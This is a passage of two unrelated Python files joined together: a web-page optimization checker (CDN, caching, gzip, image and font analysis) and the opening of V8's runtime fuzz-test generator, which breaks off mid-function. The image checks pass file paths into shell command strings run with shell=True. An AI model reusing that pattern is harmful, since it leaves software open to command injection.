logging.debug("image check took %0.3f seconds", self.image_time)
logging.debug('Waiting for CDN check to complete')
if self.cdn_thread is not None:
self.cdn_thread.join()
self.cdn_thread = None
if self.cdn_time is not None:
logging.debug("CDN check took %0.3f seconds", self.cdn_time)
logging.debug('Waiting for Hosting check to complete')
if self.hosting_thread is not None:
self.hosting_thread.join()
self.hosting_thread = None
if self.hosting_time is not None:
logging.debug("Hosting check took %0.3f seconds", self.hosting_time)
# Merge the results together
for request_id in self.cdn_results:
if request_id not in self.results:
self.results[request_id] = {}
self.results[request_id]['cdn'] = self.cdn_results[request_id]
for request_id in self.gzip_results:
if request_id not in self.results:
self.results[request_id] = {}
self.results[request_id]['gzip'] = self.gzip_results[request_id]
for request_id in self.image_results:
if request_id not in self.results:
self.results[request_id] = {}
self.results[request_id]['image'] = self.image_results[request_id]
for request_id in self.progressive_results:
if request_id not in self.results:
self.results[request_id] = {}
self.results[request_id]['progressive'] = self.progressive_results[request_id]
for request_id in self.font_results:
if request_id not in self.results:
self.results[request_id] = {}
self.results[request_id]['font'] = self.font_results[request_id]
if self.task is not None and 'page_data' in self.task:
for name in self.hosting_results:
self.task['page_data'][name] = self.hosting_results[name]
# Save the results
if self.results:
path = os.path.join(self.task['dir'], self.task['prefix']) + '_optimization.json.gz'
gz_file = gzip.open(path, GZIP_TEXT, 7)
if gz_file:
gz_file.write(json.dumps(self.results))
gz_file.close()
logging.debug('Optimization checks complete')
return self.results
def check_keep_alive(self):
"""Check for requests where the connection is force-closed"""
if (sys.version_info > (3, 0)):
from urllib.parse import urlsplit # pylint: disable=import-error
else:
from urlparse import urlsplit # pylint: disable=import-error
# build a list of origins and how many requests were issued to each
origins = {}
for request_id in self.requests:
request = self.requests[request_id]
if 'url' in request:
url = request['full_url'] if 'full_url' in request else request['url']
parsed = urlsplit(url)
origin = parsed.scheme + '://' + parsed.netloc
if origin not in origins:
origins[origin] = 0
origins[origin] += 1
for request_id in self.requests:
try:
request = self.requests[request_id]
if 'url' in request:
check = {'score': 100}
url = request['full_url'] if 'full_url' in request else request['url']
parsed = urlsplit(url)
origin = parsed.scheme + '://' + parsed.netloc
if origins[origin] > 1:
check['score'] = 100
keep_alive = self.get_header_value(request['response_headers'],
'Connection')
if keep_alive is not None and keep_alive.lower().strip().find('close') > -1:
check['score'] = 0
if request_id not in self.results:
self.results[request_id] = {}
self.results[request_id]['keep_alive'] = check
except Exception:
logging.exception('Error checking keep-alive')
def get_time_remaining(self, request):
"""See if a request is static and how long it can be cached for"""
from email.utils import parsedate
re_max_age = re.compile(r'max-age[ ]*=[ ]*(?P<maxage>[\d]+)')
is_static = False
time_remaining = -1
try:
if 'response_headers' in request:
content_length = self.get_header_value(request['response_headers'],
'Content-Length')
if content_length is not None:
content_length = int(re.search(r'\d+', str(content_length)).group())
if content_length == 0:
return is_static, time_remaining
if 'response_headers' in request:
content_type = self.get_header_value(request['response_headers'],
'Content-Type')
if content_type is None or \
(content_type.find('/html') == -1 and
content_type.find('/cache-manifest') == -1):
is_static = True
cache = self.get_header_value(request['response_headers'], 'Cache-Control')
pragma = self.get_header_value(request['response_headers'], 'Pragma')
expires = self.get_header_value(request['response_headers'], 'Expires')
max_age_matches = None
if cache is not None:
max_age_matches = re.search(re_max_age, cache)
cache = cache.lower()
if cache.find('no-store') > -1 or cache.find('no-cache') > -1:
is_static = False
if is_static and pragma is not None:
pragma = pragma.lower()
if pragma.find('no-cache') > -1:
is_static = False
if is_static:
time_remaining = 0
if max_age_matches is not None:
time_remaining = int(max_age_matches.groupdict().get('maxage'))
age = self.get_header_value(request['response_headers'], 'Age')
if time_remaining == 0:
is_static = False
time_remaining = -1
elif age is not None:
time_remaining -= int(re.search(r'\d+',
str(age).strip()).group())
elif expires is not None:
date = self.get_header_value(request['response_headers'], 'Date')
exp = time.mktime(parsedate(expires))
if date is not None:
now = time.mktime(parsedate(date))
else:
now = time.time()
time_remaining = int(exp - now)
if time_remaining < 0:
is_static = False
except Exception:
logging.exception('Error calculating time remaining')
return is_static, time_remaining
def check_cache_static(self):
"""Check static resources for how long they are cacheable for"""
for request_id in self.requests:
try:
request = self.requests[request_id]
check = {'score': -1, 'time': 0}
if 'status' in request and request['status'] == 200:
is_static, time_remaining = self.get_time_remaining(request)
if is_static:
check['time'] = time_remaining
if time_remaining >= 604800: # 7 days
check['score'] = 100
elif time_remaining >= 3600: # 1 hour
check['score'] = 50
else:
check['score'] = 0
if check['score'] >= 0:
if request_id not in self.results:
self.results[request_id] = {}
self.results[request_id]['cache'] = check
except Exception:
logging.exception('Error checking cache static')
def check_hosting(self):
"""Pull the data needed to determine the hosting"""
start = monotonic()
self.hosting_results['base_page_ip_ptr'] = ''
self.hosting_results['base_page_cname'] = ''
self.hosting_results['base_page_dns_server'] = ''
domain = None
if self.task is not None and 'page_data' in self.task and \
'document_hostname' in self.task['page_data']:
domain = self.task['page_data']['document_hostname']
if domain is not None:
try:
from dns import resolver, reversename
dns_resolver = resolver.Resolver()
dns_resolver.timeout = 5
dns_resolver.lifetime = 5
# reverse-lookup the edge server
try:
addresses = dns_resolver.query(domain)
if addresses:
addr = str(addresses[0])
addr_name = reversename.from_address(addr)
if addr_name:
name = str(dns_resolver.query(addr_name, "PTR")[0])
if name:
self.hosting_results['base_page_ip_ptr'] = name.strip('. ')
except Exception:
pass
# get the CNAME for the address
try:
answers = dns_resolver.query(domain, 'CNAME')
if answers and len(answers):
for rdata in answers:
name = '.'.join(rdata.target).strip(' .')
if name != domain:
self.hosting_results['base_page_cname'] = name
break
except Exception:
pass
# get the name server for the domain
done = False
while domain is not None and not done:
try:
dns_servers = dns_resolver.query(domain, "NS")
dns_name = str(dns_servers[0].target).strip('. ')
if dns_name:
self.hosting_results['base_page_dns_server'] = dns_name
done = True
except Exception:
pass
pos = domain.find('.')
if pos > 0:
domain = domain[pos + 1:]
else:
domain = None
except Exception:
logging.exception('Error checking hosting')
self.hosting_time = monotonic() - start
def check_cdn(self):
"""Check each request to see if it was served from a CDN"""
if (sys.version_info > (3, 0)):
from urllib.parse import urlparse # pylint: disable=import-error
else:
from urlparse import urlparse # pylint: disable=import-error
start = monotonic()
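# Three passes: match each request's domain against the static CNAME list, resolve
# the still-unknown domains in parallel DNS worker threads (CNAME/PTR lookups), then
# fall back to response-header fingerprints for anything still unidentified.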
# First pass, build a list of domains and see if the headers or domain matches
static_requests = {}
domains = {}
for request_id in self.requests:
request = self.requests[request_id]
is_static, _ = self.get_time_remaining(request)
if is_static:
static_requests[request_id] = True
if 'url' in request:
url = request['full_url'] if 'full_url' in request else request['url']
domain = urlparse(url).hostname
if domain is not None:
if domain not in domains:
# Check the domain itself against the CDN list
domains[domain] = ''
provider = self.check_cdn_name(domain)
if provider is not None:
domains[domain] = provider
# Spawn several workers to do CNAME lookups for the unknown domains
count = 0
for domain in domains:
if not domains[domain]:
count += 1
self.dns_lookup_queue.put(domain)
if count:
thread_count = min(10, count)
threads = []
for _ in range(thread_count):
thread = threading.Thread(target=self.dns_worker)
thread.start()
threads.append(thread)
for thread in threads:
thread.join()
try:
while True:
dns_result = self.dns_result_queue.get_nowait()
domains[dns_result['domain']] = dns_result['provider']
except Exception:
pass
# Final pass, populate the CDN info for each request
for request_id in self.requests:
check = {'score': -1, 'provider': ''}
request = self.requests[request_id]
if request_id in static_requests:
check['score'] = 0
if 'url' in request:
url = request['full_url'] if 'full_url' in request else request['url']
domain = urlparse(url).hostname
if domain is not None:
if domain in domains and domains[domain]:
check['score'] = 100
check['provider'] = domains[domain]
if not check['provider'] and 'response_headers' in request:
provider = self.check_cdn_headers(request['response_headers'])
if provider is not None:
check['score'] = 100
check['provider'] = provider
self.cdn_results[request_id] = check
self.cdn_time = monotonic() - start
def find_dns_cdn(self, domain, depth=0):
"""Recursively check a CNAME chain"""
from dns import resolver, reversename
dns_resolver = resolver.Resolver()
dns_resolver.timeout = 1
dns_resolver.lifetime = 1
provider = self.check_cdn_name(domain)
# First do a CNAME check
if provider is None:
try:
answers = dns_resolver.query(domain, 'CNAME')
if answers and len(answers):
for rdata in answers:
name = '.'.join(rdata.target).strip(' .')
if name != domain:
provider = self.check_cdn_name(name)
if provider is None and depth < 10:
provider = self.find_dns_cdn(name, depth + 1)
if provider is not None:
break
except Exception:
pass
# Try a reverse-lookup of the address
if provider is None:
try:
addresses = dns_resolver.query(domain)
if addresses:
addr = str(addresses[0])
addr_name = reversename.from_address(addr)
if addr_name:
name = str(dns_resolver.query(addr_name, "PTR")[0])
if name:
provider = self.check_cdn_name(name)
except Exception:
pass
return provider
def dns_worker(self):
"""Handle the DNS CNAME lookups and checking in multiple threads"""
try:
while True:
domain = self.dns_lookup_queue.get_nowait()
try:
provider = self.find_dns_cdn(domain)
if provider is not None:
self.dns_result_queue.put({'domain': domain, 'provider': provider})
except Exception:
logging.debug('Error in dns worker')
self.dns_lookup_queue.task_done()
except Exception:
pass
def check_cdn_name(self, domain):
"""Check the given domain against our cname list"""
if domain is not None and len(domain):
check_name = domain.lower()
for cdn in self.cdn_cnames:
for cname in self.cdn_cnames[cdn]:
if check_name.find(cname) > -1:
return cdn
return None
def check_cdn_headers(self, headers):
"""Check the given headers against our header list"""
matched_cdns = []
for cdn in self.cdn_headers:
for header_group in self.cdn_headers[cdn]:
all_match = True
for name in header_group:
value = self.get_header_value(headers, name)
if value is None:
all_match = False
break
else:
value = value.lower()
check = header_group[name].lower()
if len(check) and value.find(check) == -1:
all_match = False
break
if all_match:
matched_cdns.append(cdn)
break
if not len(matched_cdns):
return None
return ', '.join(matched_cdns)
def check_gzip(self):
"""Check each request to see if it can be compressed"""
start = monotonic()
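# Score convention used below: 100 = already served compressed (or compressing would
# not help), -1 = check not applicable (tiny response, sniffed binary content, no
# body), otherwise the achievable compressed size as a percentage of the current size.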
for request_id in self.requests:
try:
request = self.requests[request_id]
content_length = None
if 'response_headers' in request:
content_length = self.get_header_value(request['response_headers'], 'Content-Length')
if 'objectSize' in request:
content_length = request['objectSize']
elif content_length is not None:
content_length = int(re.search(r'\d+', str(content_length)).group())
elif 'transfer_size' in request:
content_length = request['transfer_size']
if content_length is None:
content_length = 0
check = {'score': 0, 'size': content_length, 'target_size': content_length}
encoding = None
if 'response_headers' in request:
encoding = self.get_header_value(request['response_headers'],
'Content-Encoding')
# Check for responses that are already compressed (ignore the level)
if encoding is not None:
if encoding.find('gzip') >= 0 or \
encoding.find('deflate') >= 0 or \
encoding.find('br') >= 0:
check['score'] = 100
# Ignore small responses that will fit in a packet
if not check['score'] and content_length < 1400:
check['score'] = -1
# Try compressing it if it isn't an image
if not check['score'] and 'body' in request:
sniff_type = self.sniff_file_content(request['body'])
if sniff_type is not None:
check['score'] = -1
else:
out_file = request['body'] + '.gzip'
with open(request['body'], 'rb') as f_in:
with gzip.open(out_file, 'wb', 7) as f_out:
shutil.copyfileobj(f_in, f_out)
if os.path.isfile(out_file):
target_size = os.path.getsize(out_file)
try:
os.remove(out_file)
except Exception:
pass
if target_size is not None:
delta = content_length - target_size
# Only count it if there is at least 1 packet and 10% savings
if target_size > 0 and \
delta > 1400 and \
target_size < (content_length * 0.9):
check['target_size'] = target_size
check['score'] = int(target_size * 100 / content_length)
else:
check['score'] = -1
else:
check['score'] = -1
else:
check['score'] = -1
if check['score'] >= 0:
self.gzip_results[request_id] = check
except Exception:
logging.exception('Error checking gzip')
self.gzip_time = monotonic() - start
def check_images(self):
"""Check each request to see if images can be compressed better"""
start = monotonic()
for request_id in self.requests:
try:
request = self.requests[request_id]
content_length = None
if 'response_headers' in request:
content_length = self.get_header_value(request['response_headers'], 'Content-Length')
if content_length is not None:
content_length = int(re.search(r'\d+', str(content_length)).group())
elif 'transfer_size' in request:
content_length = request['transfer_size']
check = {'score': -1, 'size': content_length, 'target_size': content_length}
if content_length and 'body' in request:
sniff_type = self.sniff_file_content(request['body'])
if sniff_type == 'jpeg':
if content_length < 1400:
check['score'] = 100
else:
# Compress it as a quality 85 stripped progressive image and compare
jpeg_file = request['body'] + '.jpg'
command = '{0} -define jpeg:dct-method=fast -strip '\
'-interlace Plane -quality 85 '\
'"{1}" "{2}"'.format(self.job['image_magick']['convert'],
request['body'], jpeg_file)
subprocess.call(command, shell=True)
if os.path.isfile(jpeg_file):
target_size = os.path.getsize(jpeg_file)
try:
os.remove(jpeg_file)
except Exception:
pass
delta = content_length - target_size
# Only count it if there is at least 1 packet savings
if target_size > 0 and delta > 1400:
check['target_size'] = target_size
check['score'] = int(target_size * 100 / content_length)
else:
check['score'] = 100
elif sniff_type == 'png':
if 'response_body' not in request:
request['response_body'] = ''
with open(request['body'], 'rb') as f_in:
request['response_body'] = f_in.read()
if content_length < 1400:
check['score'] = 100
else:
# spell-checker: disable
image_chunks = [b"iCCP", b"tIME", b"gAMA", b"PLTE", b"acTL", b"IHDR", b"cHRM",
b"bKGD", b"tRNS", b"sBIT", b"sRGB", b"pHYs", b"hIST", b"vpAg",
b"oFFs", b"fcTL", b"fdAT", b"IDAT"]
# spell-checker: enable
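# Walk the PNG chunk list (8-byte signature, then length/type/data/CRC per chunk)
# and total up only the chunks listed above; the 12 bytes added per kept chunk
# cover the 4-byte length, 4-byte type and 4-byte CRC fields.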
body = request['response_body']
image_size = len(body)
valid = True
target_size = 8
bytes_remaining = image_size - 8
pos = 8
while valid and bytes_remaining >= 4:
chunk_len = struct.unpack('>I', body[pos: pos + 4])[0]
pos += 4
if chunk_len + 12 <= bytes_remaining:
chunk_type = body[pos: pos + 4]
pos += 4
if chunk_type in image_chunks:
target_size += chunk_len + 12
pos += chunk_len + 4 # Skip the data and CRC
bytes_remaining -= chunk_len + 12
else:
valid = False
bytes_remaining = 0
if valid:
delta = content_length - target_size
# Only count it if there is at least 1 packet savings
if target_size > 0 and delta > 1400:
check['target_size'] = target_size
check['score'] = int(target_size * 100 / content_length)
else:
check['score'] = 100
elif sniff_type == 'gif':
if content_length < 1400:
check['score'] = 100
else:
is_animated = False
from PIL import Image
with Image.open(request['body']) as gif:
try:
gif.seek(1)
except EOFError:
is_animated = False
else:
is_animated = True
if is_animated:
check['score'] = 100
else:
# Convert it to a PNG
png_file = request['body'] + '.png'
command = 'convert "{0}" "{1}"'.format(request['body'], png_file)
subprocess.call(command, shell=True)
if os.path.isfile(png_file):
target_size = os.path.getsize(png_file)
try:
os.remove(png_file)
except Exception:
pass
delta = content_length - target_size
# Only count it if there is at least 1 packet savings
if target_size > 0 and delta > 1400:
check['target_size'] = target_size
check['score'] = int(target_size * 100 / content_length)
else:
check['score'] = 100
elif sniff_type == 'webp':
check['score'] = 100
if check['score'] >= 0:
self.image_results[request_id] = check
except Exception:
logging.exception('Error checking images')
self.image_time = monotonic() - start
def check_progressive(self):
"""Count the number of scan lines in each jpeg"""
from PIL import Image
start = monotonic()
for request_id in self.requests:
try:
request = self.requests[request_id]
if 'body' in request:
sniff_type = self.sniff_file_content(request['body'])
if sniff_type == 'jpeg':
check = {'size': os.path.getsize(request['body']), 'scan_count': 1}
image = Image.open(request['body'])
info = dict(image.info)
image.close()
if 'progression' in info and info['progression']:
check['scan_count'] = 0
if 'response_body' not in request:
request['response_body'] = ''
with open(request['body'], 'rb') as f_in:
request['response_body'] = f_in.read()
body = request['response_body']
content_length = len(request['response_body'])
pos = 0
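# Walk the JPEG marker stream: markers are introduced by 0xff, 0xda (Start Of Scan)
# begins entropy-coded data that runs until the next unpadded 0xff marker, and most
# other markers carry a 2-byte big-endian length. A baseline JPEG has a single scan;
# a progressive JPEG has several.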
try:
while pos < content_length:
block = struct.unpack('B', body[pos: pos + 1])[0]  # slice keeps a bytes object under Python 3
pos += 1
if block != 0xff:
break
block = struct.unpack('B', body[pos: pos + 1])[0]
pos += 1
while block == 0xff:
block = struct.unpack('B', body[pos: pos + 1])[0]
pos += 1
if block == 0x01 or (block >= 0xd0 and block <= 0xd9):
continue
elif block == 0xda: # Image data
check['scan_count'] += 1
# Seek to the next non-padded 0xff to find the next marker
found = False
while not found and pos < content_length:
value = struct.unpack('B', body[pos: pos + 1])[0]
pos += 1
if value == 0xff:
value = struct.unpack('B', body[pos: pos + 1])[0]
pos += 1
if value != 0x00:
found = True
pos -= 2
else:
chunk = body[pos: pos + 2]
block_size = struct.unpack('2B', chunk)
pos += 2
block_size = block_size[0] * 256 + block_size[1] - 2
pos += block_size
except Exception:
logging.exception('Error scanning JPEG')
self.progressive_results[request_id] = check
except Exception:
logging.exception('Error checking progressive')
self.progressive_time = monotonic() - start
def check_fonts(self):
"""Check each request to extract metadata about fonts"""
start = monotonic()
try:
from fontTools.ttLib import TTFont
for request_id in self.requests:
try:
request = self.requests[request_id]
if 'body' in request:
sniff_type = self.sniff_file_content(request['body'])
if sniff_type is not None and sniff_type in ['OTF', 'TTF', 'WOFF', 'WOFF2']:
tables = None
ttf = TTFont(request['body'], lazy=True)
reader = ttf.reader
tags = sorted(reader.keys())
for tag in tags:
entry = reader.tables[tag]
if tables is None:
tables = {}
tables[tag] = entry.length
ttf.close()
if tables is not None:
self.font_results[request_id] = {'table_sizes': tables}
except Exception:
logging.exception('Error checking font')
except Exception:
pass
self.font_time = monotonic() - start
def get_header_value(self, headers, name):
"""Get the value for the requested header"""
value = None
if headers:
if name in headers:
value = headers[name]
else:
find = name.lower()
for header_name in headers:
check = header_name.lower()
if check == find or (check[0] == ':' and check[1:] == find):
value = headers[header_name]
break
return value
def sniff_content(self, raw_bytes):
"""Check the beginning of the file to see if it is a known image type"""
content_type = None
hex_bytes = binascii.hexlify(raw_bytes[:14])
# spell-checker: disable
if hex_bytes[0:6] == b'ffd8ff':
content_type = 'jpeg'
elif hex_bytes[0:16] == b'89504e470d0a1a0a':
content_type = 'png'
elif raw_bytes[:6] == b'GIF87a' or raw_bytes[:6] == b'GIF89a':
content_type = 'gif'
elif raw_bytes[:4] == b'RIFF' and raw_bytes[8:14] == b'WEBPVP':
content_type = 'webp'
elif raw_bytes[:4] == b'OTTO':
content_type = 'OTF'
elif raw_bytes[:4] == b'ttcf':
content_type = 'TTF'
elif raw_bytes[:4] == b'wOFF':
content_type = 'WOFF'
elif raw_bytes[:4] == b'wOF2':
content_type = 'WOFF2'
# spell-checker: enable
return content_type
def sniff_file_content(self, image_file):
"""Sniff the content type from a file"""
content_type = None
with open(image_file, 'rb') as f_in:
raw = f_in.read(14)
content_type = self.sniff_content(raw)
return content_type
|
generate-runtime-tests.py
|
#!/usr/bin/env python
# Copyright 2014 the V8 project authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
import itertools
import js2c
import multiprocessing
import optparse
import os
import random
import re
import shutil
import signal
import string
import subprocess
import sys
import time
FILENAME = "src/runtime.cc"
HEADERFILENAME = "src/runtime.h"
FUNCTION = re.compile("^RUNTIME_FUNCTION\(Runtime_(\w+)")
ARGSLENGTH = re.compile(".*ASSERT\(.*args\.length\(\) == (\d+)\);")
FUNCTIONEND = "}\n"
MACRO = re.compile(r"^#define ([^ ]+)\(([^)]*)\) *([^\\]*)\\?\n$")
FIRST_WORD = re.compile("^\s*(.*?)[\s({\[]")
WORKSPACE = os.path.abspath(os.path.join(os.path.dirname(sys.argv[0]), ".."))
BASEPATH = os.path.join(WORKSPACE, "test", "mjsunit", "runtime-gen")
THIS_SCRIPT = os.path.relpath(sys.argv[0])
# Expand these macros, they define further runtime functions.
EXPAND_MACROS = [
"BUFFER_VIEW_GETTER",
"DATA_VIEW_GETTER",
"DATA_VIEW_SETTER",
"RUNTIME_UNARY_MATH",
]
# TODO(jkummerow): We could also whitelist the following macros, but the
# functions they define are so trivial that it's unclear how much benefit
# that would provide:
# ELEMENTS_KIND_CHECK_RUNTIME_FUNCTION
# FIXED_TYPED_ARRAYS_CHECK_RUNTIME_FUNCTION
# TYPED_ARRAYS_CHECK_RUNTIME_FUNCTION
# Counts of functions in each detection state. These are used to assert
# that the parser doesn't bit-rot. Change the values as needed when you add,
# remove or change runtime functions, but make sure we don't lose our ability
# to parse them!
EXPECTED_FUNCTION_COUNT = 358
EXPECTED_FUZZABLE_COUNT = 326
EXPECTED_CCTEST_COUNT = 6
EXPECTED_UNKNOWN_COUNT = 4
EXPECTED_BUILTINS_COUNT = 798
# Don't call these at all.
BLACKLISTED = [
"Abort", # Kills the process.
"AbortJS", # Kills the process.
"CompileForOnStackReplacement", # Riddled with ASSERTs.
"IS_VAR", # Not implemented in the runtime.
"ListNatives", # Not available in Release mode.
"SetAllocationTimeout", # Too slow for fuzzing.
"SystemBreak", # Kills (int3) the process.
# These are weird. They violate some invariants when called after
# bootstrapping.
"DisableAccessChecks",
"EnableAccessChecks",
# The current LiveEdit implementation relies on and messes with internals
# in ways that makes it fundamentally unfuzzable :-(
"DebugGetLoadedScripts",
"DebugSetScriptSource",
"LiveEditFindSharedFunctionInfosForScript",
"LiveEditFunctionSourceUpdated",
"LiveEditGatherCompileInfo",
"LiveEditPatchFunctionPositions",
"LiveEditReplaceFunctionCode",
"LiveEditReplaceRefToNestedFunction",
"LiveEditReplaceScript",
"LiveEditRestartFrame",
"SetScriptBreakPoint",
# TODO(jkummerow): Fix these and un-blacklist them!
"CreateDateTimeFormat",
"CreateNumberFormat",
]
# These will always throw.
THROWS = [
"CheckExecutionState", # Needs to hit a break point.
"CheckIsBootstrapping", # Needs to be bootstrapping.
"DebugEvaluate", # Needs to hit a break point.
"DebugEvaluateGlobal", # Needs to hit a break point.
"DebugIndexedInterceptorElementValue", # Needs an indexed interceptor.
"DebugNamedInterceptorPropertyValue", # Needs a named interceptor.
"DebugSetScriptSource", # Checks compilation state of script.
"GetAllScopesDetails", # Needs to hit a break point.
"GetFrameCount", # Needs to hit a break point.
"GetFrameDetails", # Needs to hit a break point.
"GetRootNaN", # Needs to be bootstrapping.
"GetScopeCount", # Needs to hit a break point.
"GetScopeDetails", # Needs to hit a break point.
"GetStepInPositions", # Needs to hit a break point.
"GetTemplateField", # Needs a {Function,Object}TemplateInfo.
"GetThreadCount", # Needs to hit a break point.
"GetThreadDetails", # Needs to hit a break point.
"IsAccessAllowedForObserver", # Needs access-check-required object.
"UnblockConcurrentRecompilation" # Needs --block-concurrent-recompilation.
]
# Definitions used in CUSTOM_KNOWN_GOOD_INPUT below.
_BREAK_ITERATOR = (
"%GetImplFromInitializedIntlObject(new Intl.v8BreakIterator())")
_COLLATOR = "%GetImplFromInitializedIntlObject(new Intl.Collator('en-US'))"
_DATETIME_FORMAT = (
"%GetImplFromInitializedIntlObject(new Intl.DateTimeFormat('en-US'))")
_NUMBER_FORMAT = (
"%GetImplFromInitializedIntlObject(new Intl.NumberFormat('en-US'))")
# Custom definitions for function input that does not throw.
# Format: "FunctionName": ["arg0", "arg1", ..., argslength].
# None means "fall back to autodetected value".
CUSTOM_KNOWN_GOOD_INPUT = {
"Apply": ["function() {}", None, None, None, None, None],
"ArrayBufferSliceImpl": [None, None, 0, None],
"ArrayConcat": ["[1, 'a']", None],
"BreakIteratorAdoptText": [_BREAK_ITERATOR, None, None],
"BreakIteratorBreakType": [_BREAK_ITERATOR, None],
"BreakIteratorCurrent": [_BREAK_ITERATOR, None],
"BreakIteratorFirst": [_BREAK_ITERATOR, None],
"BreakIteratorNext": [_BREAK_ITERATOR, None],
"CompileString": [None, "false", None],
"CreateBreakIterator": ["'en-US'", "{type: 'string'}", None, None],
"CreateJSFunctionProxy": [None, "function() {}", None, None, None],
"CreatePrivateSymbol": ["\"foo\"", None],
"CreateSymbol": ["\"foo\"", None],
"DateParseString": [None, "new Array(8)", None],
"DefineOrRedefineAccessorProperty": [None, None, "function() {}",
"function() {}", 2, None],
"FunctionBindArguments": [None, None, "undefined", None, None],
"GetBreakLocations": [None, 0, None],
"GetDefaultReceiver": ["function() {}", None],
"GetImplFromInitializedIntlObject": ["new Intl.NumberFormat('en-US')", None],
"InternalCompare": [_COLLATOR, None, None, None],
"InternalDateFormat": [_DATETIME_FORMAT, None, None],
"InternalDateParse": [_DATETIME_FORMAT, None, None],
"InternalNumberFormat": [_NUMBER_FORMAT, None, None],
"InternalNumberParse": [_NUMBER_FORMAT, None, None],
"IsSloppyModeFunction": ["function() {}", None],
"LoadMutableDouble": ["{foo: 1.2}", None, None],
"NewObjectFromBound": ["(function() {}).bind({})", None],
"NumberToRadixString": [None, "2", None],
"ParseJson": ["\"{}\"", 1],
"RegExpExecMultiple": [None, None, "['a']", "['a']", None],
"SetAccessorProperty": [None, None, "undefined", "undefined", None, None,
None],
"SetIteratorInitialize": [None, None, "2", None],
"SetDebugEventListener": ["undefined", None, None],
"SetFunctionBreakPoint": [None, 200, None, None],
"StringBuilderConcat": ["[1, 2, 3]", 3, None, None],
"StringBuilderJoin": ["['a', 'b']", 4, None, None],
"StringMatch": [None, None, "['a', 'b']", None],
"StringNormalize": [None, 2, None],
"StringReplaceGlobalRegExpWithString": [None, None, None, "['a']", None],
"TypedArrayInitialize": [None, 6, "new ArrayBuffer(8)", None, 4, None],
"TypedArrayInitializeFromArrayLike": [None, 6, None, None, None],
"TypedArraySetFastCases": [None, None, "0", None],
}
# Types of arguments that cannot be generated in a JavaScript testcase.
NON_JS_TYPES = [
"Code", "Context", "FixedArray", "FunctionTemplateInfo",
"JSFunctionResultCache", "JSMessageObject", "Map", "ScopeInfo",
"SharedFunctionInfo"]
class Generator(object):
def RandomVariable(self, varname, vartype, simple):
if simple:
return self._Variable(varname, self.GENERATORS[vartype][0])
return self.GENERATORS[vartype][1](self, varname,
self.DEFAULT_RECURSION_BUDGET)
@staticmethod
def IsTypeSupported(typename):
return typename in Generator.GENERATORS
USUAL_SUSPECT_PROPERTIES = ["size", "length", "byteLength", "__proto__",
"prototype", "0", "1", "-1"]
DEFAULT_RECURSION_BUDGET = 2
PROXY_TRAPS = """{
getOwnPropertyDescriptor: function(name) {
return {value: function() {}, configurable: true, writable: true,
enumerable: true};
},
getPropertyDescriptor: function(name) {
return {value: function() {}, configurable: true, writable: true,
enumerable: true};
},
getOwnPropertyNames: function() { return []; },
getPropertyNames: function() { return []; },
defineProperty: function(name, descriptor) {},
delete: function(name) { return true; },
fix: function() {}
}"""
def _Variable(self, name, value, fallback=None):
args = { "name": name, "value": value, "fallback": fallback }
if fallback:
wrapper = "try { %%s } catch(e) { var %(name)s = %(fallback)s; }" % args
else:
wrapper = "%s"
return [wrapper % ("var %(name)s = %(value)s;" % args)]
def _Boolean(self, name, recursion_budget):
return self._Variable(name, random.choice(["true", "false"]))
def _Oddball(self, name, recursion_budget):
return self._Variable(name,
random.choice(["true", "false", "undefined", "null"]))
def _StrictMode(self, name, recursion_budget):
return self._Variable(name, random.choice([0, 1]))
def _Int32(self, name, recursion_budget=0):
die = random.random()
if die < 0.5:
value = random.choice([-3, -1, 0, 1, 2, 10, 515, 0x3fffffff, 0x7fffffff,
0x40000000, -0x40000000, -0x80000000])
elif die < 0.75:
value = random.randint(-1000, 1000)
else:
value = random.randint(-0x80000000, 0x7fffffff)
return self._Variable(name, value)
def _Uint32(self, name, recursion_budget=0):
die = random.random()
if die < 0.5:
value = random.choice([0, 1, 2, 3, 4, 8, 0x3fffffff, 0x40000000,
0x7fffffff, 0xffffffff])
elif die < 0.75:
value = random.randint(0, 1000)
else:
value = random.randint(0, 0xffffffff)
return self._Variable(name, value)
def _Smi(self, name, recursion_budget):
die = random.random()
if die < 0.5:
value = random.choice([-5, -1, 0, 1, 2, 3, 0x3fffffff, -0x40000000])
elif die < 0.75:
value = random.randint(-1000, 1000)
else:
value = random.randint(-0x40000000, 0x3fffffff)
return self._Variable(name, value)
def _Number(self, name, recursion_budget):
die = random.random()
if die < 0.5:
return self._Smi(name, recursion_budget)
elif die < 0.6:
value = random.choice(["Infinity", "-Infinity", "NaN", "-0",
"1.7976931348623157e+308", # Max value.
"2.2250738585072014e-308", # Min value.
"4.9406564584124654e-324"]) # Min subnormal.
else:
value = random.lognormvariate(0, 15)
return self._Variable(name, value)
def _RawRandomString(self, minlength=0, maxlength=100,
alphabet=string.ascii_letters):
length = random.randint(minlength, maxlength)
result = ""
for i in xrange(length):
result += random.choice(alphabet)
return result
def _SeqString(self, name, recursion_budget):
s1 = self._RawRandomString(1, 5)
s2 = self._RawRandomString(1, 5)
# 'foo' + 'bar'
return self._Variable(name, "\"%s\" + \"%s\"" % (s1, s2))
def _SeqTwoByteString(self, name):
s1 = self._RawRandomString(1, 5)
s2 = self._RawRandomString(1, 5)
# 'foo' + unicode + 'bar'
return self._Variable(name, "\"%s\" + \"\\2082\" + \"%s\"" % (s1, s2))
def _SlicedString(self, name):
s = self._RawRandomString(20, 30)
# 'ffoo12345678901234567890'.substr(1)
return self._Variable(name, "\"%s\".substr(1)" % s)
def _ConsString(self, name):
s1 = self._RawRandomString(8, 15)
s2 = self._RawRandomString(8, 15)
# 'foo12345' + (function() { return 'bar12345';})()
return self._Variable(name,
"\"%s\" + (function() { return \"%s\";})()" % (s1, s2))
def _InternalizedString(self, name):
return self._Variable(name, "\"%s\"" % self._RawRandomString(0, 20))
def _String(self, name, recursion_budget):
die = random.random()
if die < 0.5:
string = random.choice(self.USUAL_SUSPECT_PROPERTIES)
return self._Variable(name, "\"%s\"" % string)
elif die < 0.6:
number_name = name + "_number"
result = self._Number(number_name, recursion_budget)
return result + self._Variable(name, "\"\" + %s" % number_name)
elif die < 0.7:
return self._SeqString(name, recursion_budget)
elif die < 0.8:
return self._ConsString(name)
elif die < 0.9:
return self._InternalizedString(name)
else:
return self._SlicedString(name)
def _Symbol(self, name, recursion_budget):
raw_string_name = name + "_1"
result = self._String(raw_string_name, recursion_budget)
return result + self._Variable(name, "Symbol(%s)" % raw_string_name)
def _Name(self, name, recursion_budget):
if random.random() < 0.2:
return self._Symbol(name, recursion_budget)
return self._String(name, recursion_budget)
def _JSValue(self, name, recursion_budget):
die = random.random()
raw_name = name + "_1"
